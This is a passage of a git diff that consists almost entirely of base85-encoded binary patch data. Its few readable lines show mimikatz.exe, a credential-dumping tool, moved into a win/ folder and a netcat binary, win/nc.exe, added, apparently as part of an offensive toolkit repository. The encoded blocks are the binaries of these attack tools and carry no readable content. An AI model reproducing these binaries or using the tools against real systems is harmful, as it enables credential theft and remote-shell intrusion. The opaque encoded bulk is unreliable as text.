zuJbjnSM>;VGaNPvWOw65z^9{~~~&PU)7s6K)vDBz{9px}-=WLI@i(5h|~ zK?4B_Qgy2dV4ADCbpS}auZ~&kz-%say<8%V46U;$hq)daeR&xyqj(_zQX@3bGRAup z)h^#n@Z|c2`bIFb5opWOJ1GatQxGv^eR55Q<8XjC-sEdo{zHZ$d@-511uLD^+~+{j0ewEI-BhqA&x2p=k$wYM)m= z@uhF`;}%6p71FsBKaDw=#V2VgvN$_g)ldhix?V5O*RzIuomJOUcCWv_6>XW8x&hwq zcevPZC<`;kbgOBJo2;p6t50$08}j-W4gC1JXjJH7)7w@o$&K+MEjDqJx^l^Tjve1WyuZHT;LHRn4oF1k3wB+RoyIpqCu&kPaS<8 z_C=;Demr$D%O7}<#=tq>g2tS2>nE?8N`q|BnPzW;BvG?&l7~V4K6T`Inqx+@qD|78 zZrz%>%IfC^e0ZsWzjpJyyss#lUzC;N_vzvnDvMueaRuRN5tpW>>vZ=TXYeD}bC5eD z1V?@9;0tRA@?hNY)z;$BXWGC4XzKB)uIH&nfAb!-6wAl) zAZ;Ajp{V786i&mn`NC>5cuh?&p!sOA{(>>Z*ZeTA@DH<&1wY~z{KyL!@oL2thXf8$ z%HPssQYHX|y?JDPNeHVm5^VI!AJSCJh%|q(SRL`H-sj<45Wh8m-)->zsxiCQg~N`` z4UJrj-q*7HK`ig0pLaAlur6TUEH^KIxOw^GG=`g(pJ`tHbR TAwfn6j$yY+{%dd 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 b&{mJz|B>EbD79qb@}4Z6{_gjWjspJ=>s1Qf literal 0 HcmV?d00001 diff --git a/mimikatz.exe b/win/mimikatz.exe similarity index 100% rename from mimikatz.exe rename to win/mimikatz.exe diff --git a/win/nc.exe b/win/nc.exe new file mode 100644 index 0000000000000000000000000000000000000000..2119d68bcfeeed4375a0ea3055c984849d5230e0 GIT binary patch literal 38616 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 